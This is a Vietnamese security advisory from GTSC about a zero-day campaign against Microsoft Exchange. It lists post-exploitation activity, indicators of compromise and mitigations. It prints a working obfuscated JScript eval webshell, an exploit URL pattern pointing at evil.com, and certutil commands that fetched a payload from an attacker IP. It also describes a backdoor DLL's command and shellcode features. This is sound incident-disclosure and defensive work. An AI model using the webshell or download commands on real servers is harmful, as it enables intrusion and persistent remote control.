Khoảng từ đầu tháng 08/2022, trong quá trình thực hiện giám sát an ninh mạng và xử lý sự cố, Trung tâm vận hành bảo mật GTSC SOC phát hiện một đơn vị trọng yếu bị tấn công an ninh mạng vào hệ thống ứng dụng Microsoft Exchange. Quá trình điều tra, đội ngũ chuyên gia BlueTeam xác định kẻ tấn công đã sử dụng một lỗ hổng bảo mật của Microsoft Exchange chưa từng được công bố – hay còn gọi là lỗ hổng 0-day. GTSC SOC Team ngay lập tức đưa ra phương án ngăn chặn tạm thời. Song song, các chuyên gia RedTeam cũng bắt tay ngay vào việc nghiên cứu, debug lại mã nguồn ứng dụng Mail Exchange để tìm ra mã khai thác (exploit). Với lỗ hổng bảo mật Exchange trước đây, đội ngũ RedTeam cũng đã từng phân tích ra exploit trước khi có exploit được public trên thế giới (1-day exploit) nên việc hiểu luồng, cơ chế xử lý của hệ thống Email Exchange đã giúp giảm thời gian cho quá trình research. Ngay sau khi nghiên cứu ra exploit, GTSC đã submit lên ZDI để làm việc với Microsoft nhằm nhanh chóng có bản vá.

Sau khi ZDI verify đã ghi nhận 2 bug liên quan đến exploit:

Tuy nhiên đến thời điểm hiện tại, GTSC ghi nhận thêm các đơn vị khác cũng đang gặp phải sự cố. Sau khi kiểm tra, GTSC xác nhận hệ thống bị tấn công qua lỗ hổng 0-day này. Để hỗ trợ cộng đồng ngăn chặn tạm thời trước khi có bản vá chính thức từ Microsoft, chúng tôi công bố bài viết này để cảnh báo tới các đơn vị có sử dụng hệ thống email Microsoft Exchange.

Thông tin lỗ hổng bảo mật 

                – Đội ngũ Blueteam trong quá trình giám sát phát hiện được các request exploit dựa trên log IIS có định dạng giống như lỗ hổng ProxyShell: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com. Đồng thời kiểm tra các logs khác, nhận thấy kẻ tấn công thực hiện được các câu lệnh trên hệ thống. Kiểm tra version number trên máy chủ Exchange bị tấn công nhận thấy máy chủ đã cài đặt bản cập nhật mới nhất tại thời điểm đó nên không thể có trường hợp khai thác bởi lỗ hổng Proxyshell -> xác nhận máy chủ bị khai thác bởi lỗ hổng 0-day RCE mới. Các thông tin này được Blueteam cung cấp lại cho Redteam, từ đó đội ngũ Redteam của GTSC đã tiến hành nghiên cứu để trả lời cho các câu hỏi như tại sao các request lại giống với request của bug ProxyShell?, luồng RCE được thực hiện như thế nào? 

                – Kết quả nghiên cứu đã giúp GTSC Redteam thành công tìm ra cách sử dụng đường dẫn trên để truy cập tới 1 component ở backend và thực hiện RCE. Thông tin kỹ thuật chi tiết về lỗ hổng tại thời điểm này chúng tôi xin phép chưa công bố.

Các hành vi sau khai thác

Sau quá trình khai thác thành công lỗ hổng, chúng tôi ghi nhận các hành vi tấn công nhằm thu thập thông tin và tạo chỗ đứng trong hệ thống của nạn nhân. Nhóm tấn công cũng sử dụng các kỹ thuật khác nhau nhằm tạo backdoor trên hệ thống bị ảnh hưởng và thực hiện lateral movement sang các máy chủ khác trong hệ thống.

Webshell

Chúng tôi phát hiện các webshell được drop xuống các máy chủ exchange. Các webshell chúng tôi thu thập được hầu hết được obfuscated. Thông qua User-agent chúng tôi phát hiện attacker sử dụng Antsword (một opensource có tính năng hỗ trợ quản lý webshell).

<%@Page Language=”Jscript”%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘NTcyM’+’jk3O3’+’ZhciB’+’zYWZl’+”+’P’+’S’+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘MQ==’))+char(51450/525)+”+”+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘Wg==’))+’m’+”+’UiO2V’+’2YWwo’+’UmVxd’+’WVzdC’+’5JdGV’+’tWydF’+’WjBXS’+’WFtRG’+’Z6bU8’+’xajhk’+’J10sI’+’HNhZm’+’UpOzE’+’3MTY4’+’OTE7’+”)));%>

Chúng tôi nghi ngờ các hành vi khai thác này xuất phát từ các nhóm tấn công Trung Quốc, dựa trên codepage trong webshell là 936, một bảng mã ký tự Microsoft cho tiếng Trung giản thể (simplified Chinese).

Một đặc điểm đáng chú ý khác, bên cạnh việc drop các webshell mới hacker cũng thực hiện thay đổi nội dung trong file RedirSuiteServiceProxy.aspx thành nội dung webshell. RedirSuiteServiceProxy.aspx là một tên file hợp pháp sẵn có trong máy chủ Exchange

FileNamePath
RedirSuiteServiceProxy.aspxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashxC:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Trong quá trình xử lý sự cố tại một khách hàng khác, GTSC ghi nhận nhóm tấn công có sử dụng một mẫu webshell khác

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Ref: https://github.com/antonioCoco/SharPyShell

Command Execution

Bên cạnh các hành vi thu thập thông tin trên hệ thống, attacker thực hiện tải file và kiểm tra kết nối thông qua certutil có sẵn trên môi trường Windows

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Ở cuối của mỗi câu lệnh mà kẻ tấn công thực hiện đều có chuỗi echo [S]&cd&echo [E], một trong những dấu hiệu nhận biết của China Chopper.

Ngoài ra, hacker cũng thực hiện inject DLL độc hại vào bộ nhớ, drop các file nghi ngờ lên các máy chủ bị tấn công, và thực thi các file này thông qua WMIC.

Suspicious File

Trên các máy chủ, chúng tôi phát hiện các file nghi ngờ có định dạng exe và dll

FileNamePath
DrSDKCaller.exeC:\root\DrSDKCaller.exe
all.exeC:\Users\Public\all.exe
dump.dllC:\Users\Public\dump.dll
ad.exeC:\Users\Public\ad.exe
gpg-error.exeC:\PerfLogs\gpg-error.exe
cm.exeC:\PerfLogs\cm.exe
msado32.tlbC:\Program Files\Common Files\system\ado\msado32.tlb

Trong số các file nghi ngờ trên, dựa vào các câu lệnh được thực hiện trên máy chủ, chúng tôi nhận định các file all.exe, dump.dll có nhiệm vụ trích xuất thông tin tài khoản trên hệ thống máy chủ. Sau các hành vi trích xuất thông tin tài khoản trên hệ thống, attacker sử dụng rar.exe để nén các file dump và copy ra webroot của máy chủ Exchange. Trong quá trình xử lý sự cố, các file trên đã không còn tồn tại trên hệ thống.

File cm.exe được drop xuống thư mục C:\PerfLogs\ là file cmd.exe

Malware Analysis

Thông tin DLL

File name: Dll.dll

Sha256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

Phân tích DLL

GTSC phân tích một mẫu cụ thể (074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82) để mô tả hành vi của mã độc, các mẫu DLL khác có nhiệm vụ và hành vi giống nhau, chỉ khác nhau về cấu hình listener

DLL gồm 2 hai class: Run và m. Bên trong mỗi class gọi tới các method thực hiện các nhiệm vụ khác nhau. Cụ thể:

Class Run thực hiện tạo listener lắng nghe các kết nối tới port 443, đường dẫn https://*:443/ews/web/webconfig/.

Sau quá trình lắng nghe, mã độc tạo thread mới goi tới r. Method r thực hiện:

–              Kiểm tra request nhận được có data trong body hay không. Nếu không có data đi kèm trong request gửi lên máy chủ, kết quả trả về là 404.

–              Ngược lại, nếu trong request có đi kèm data, DLL tiếp tục xử lý luồng bên trong nhánh IF:

Kiểm tra request nhận được có tồn tại “RPDbgEsJF9o8S=” hay không. Nếu có, gọi tới method i nằm trong class m để xử lý request nhận được. Kết quả trả về từ Run.m.i sẽ được covert sang chuỗi base64. Kết quả trả về cho client theo format

{

                “result”:1,

                “message”:”base64(aes(result))”

}

Class m

Method thực hiện:

–         Giải mã request nhận được bằng thuật toán AES với 16 bytes đầu tiên của request là giá trị IV, 16 bytes tiếp theo là giá trị key, các giá trị sau đó là data

–         Sau khi giải mã, lấy phần tử đầu tiên trong mảng làm flag để xử lý các case đã được định nghĩa

 Case 0: Gọi tới method info. Method này có nhiệm vụ thu thập thông tin hệ thống. Các thông tin bao như kiến trúc hệ điều hành, phiên bản framework, phiên bản hệ điều hành, v.v….GTSC mô phỏng lại case 0 bằng hình ảnh bên dưới. Request gửi lên theo format 16 bytes đầu là giá trị IV, 16 bytes tiếp theo là giá trị key, theo sau là flag để chỉ định option và phần còn lại là data.

base64 (IV | key | aes(flag|data))

Case 1: Gọi tới method sc. Method này có nhiệm vụ cấp phát vùng nhớ để thực thi shellcode

 Case 2: Gọi tới 2 method p và r. Method p xử lý các dữ liệu được ngăn cách bởi ký tự “|” lưu vào mảng array3. Mảng array3 sẽ lấy 2 phần tử đầu tiên làm tham số cho method r, method r có nhiệm vụ thực thi command

 Case 3: Gọi tới method ld. Method này có nhiệm vụ liệt kê thông tin thư mục và file theo format

D|-|<Ngày tạo> |<Ngày chỉnh sửa> |<tên thư mục hoặc tên file>

o   Case 4: Gọi tới method wf. Method này có nhiệm vụ ghi file

o   Case 5: Gọi tới method rf. Method này có nhiệm vụ đọc file

 Case 6: Tạo thư mục

o   Case 7: Xóa file hoặc thư mục

o   Case 8: Di chuyển File

o   Case 9: Set time cho file 

o   Case 10: Nạp và thực thi C# bytecode nhận từ request.

Các mẫu DLL khác có nhiệm vụ tương tự, chỉ khác nhau về cấu hình listener như sau:

                Victim 1:

https://*:443/ews/web/webconfig/

https://*:443/owa/auth/webcccsd/

https://*:444/ews/auto/

https://*:444/ews/web/api/

                Victim 2:

                                     http://*:80/owa/auth/Current/script/

https://*:443/owa/auth/Current/script/

Chúng tôi cũng phát hiện DLL được inject vào memory của tiến trình svchost.exe. DLL thực hiện kết nối gửi nhận dữ liệu tới địa chỉ 137[.]184[.]67[.]33 được config trong binary. Việc gửi nhận dữ liệu với C2 sử dụng thuật toán RC4, khóa sẽ được tạo trong thời gian chạy (runtime).

Các biện pháp ngăn chặn tạm thời

Quá trình xử lý sự cố trực tiếp của GTSC ghi nhận có trên 1 đơn vị tổ chức bị là nạn nhân của chiến dịch tấn công khai thác lỗ hổng zero day. Ngoài ra chúng tôi cũng lo ngại rằng có thể có nhiều tổ chức khác cũng đã bị khai thác nhưng chưa được phát hiện. Trong thời gian chờ đợi bản vá chính thức từ hãng, GTSC cung cấp biện pháp khắc phục tạm thời nhằm giảm thiểu việc tấn công khai thác lổ hổng bằng cách bổ sung rule chặn các request có dấu hiệu tấn công thông qua module URL Rewrite rule trên máy chủ IIS (Webserver)

– Trong Autodiscover tại FrontEnd chọn tab URL Rewrite chọn Request Blocking

– Add thêm chuỗi “.*autodiscover\.json.*\@.*Powershell.*“ vào Pattern (URL Path):   

– Condition input: lựa chọn {REQUEST_URI}

Phát hiện tấn công

Nhằm kiểm tra hệ thống đã bị tấn công bởi lổ hỗng này, các đơn vị/tổ chức có thể thực hiện theo các cách thức sau:

Cách 1: Sử dụng powershell với câu lệnh sau: (Sử dụng powershell để thực hiện search trên toàn bộ folder log IIS mất khá nhiều thời gian)

Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter “*.log” | Select-String -Pattern ‘powershell.*autodiscover\.json.*\@.*200

Cấu hình mặc định IIS log nằm tại đường dẫn “%SystemDrive%\inetpub\logs\LogFiles”

Cách 2: Sử dụng công cụ do GTSC phát triển dựa trên dấu hiệu khai thác lỗ hổng, thời gian thực hiện search nhanh hơn so với việc sử dụng powershell. Đường dẫn tải về công cụ: https://github.com/ncsgroupvn/NCSE0Scanner

Cách 3: Sử dụng công cụ của MS luôn nhé Exchange On-premises Mitigation Tool v2 (EOMTv2) link download tại đây

Indicators of Compromise (IOCs)

Webshell:

File Name: pxh4HG1v.ashx

                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx

                Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx

                Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: Xml.ashx

                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

                Path: C:\inetpub\wwwroot\aspnet_client\Xml.ashx

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

DLL

File name: Dll.dll

SHA256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

File name: 180000000.dll (Dump từ tiến trình Svchost.exe)

SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP

125[.]212[.]220[.]48

5[.]180[.]61[.]17

47[.]242[.]39[.]92

61[.]244[.]94[.]85

86[.]48[.]6[.]69

86[.]48[.]12[.]64

94[.]140[.]8[.]48

94[.]140[.]8[.]113

103[.]9[.]76[.]208

103[.]9[.]76[.]211

104[.]244[.]79[.]6

112[.]118[.]48[.]186

122[.]155[.]174[.]188

125[.]212[.]241[.]134

185[.]220[.]101[.]182

194[.]150[.]167[.]88

212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33

Mitre ATT&CK Mapping

TaticIDName
Resource DevelopmentT1586.002Compromise Accounts: Email Accounts
ExecutionT1059.003Command and Scripting Interpreter: Windows Command Shell
ExecutionT1047Windows Management Instrumentation
PersistenceT1505.003Server Software Component: Web Shell
Defense EvasionT1070.004Indicator Removal on Host: File Deletion
Defense EvasionT1036.005Masquerading: Match Legitimate Name or Location
Defense EvasionT1620Reflective Code Loading
Credential AccessT1003.001OS Credential Dumping: LSASS Memory
DiscoveryT1087Account Discovery
DiscoveryT1083File and Directory Discovery
DiscoveryT1057Process Discovery
DiscoveryT1049System Network Connections Discovery
Lateral MovementT1570Lateral Tool Transfer
CollectionT1560.001Archive Collected Data: Archive via Utility

28/09/2022 

GTSC SECURITY TEAM

Link: https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html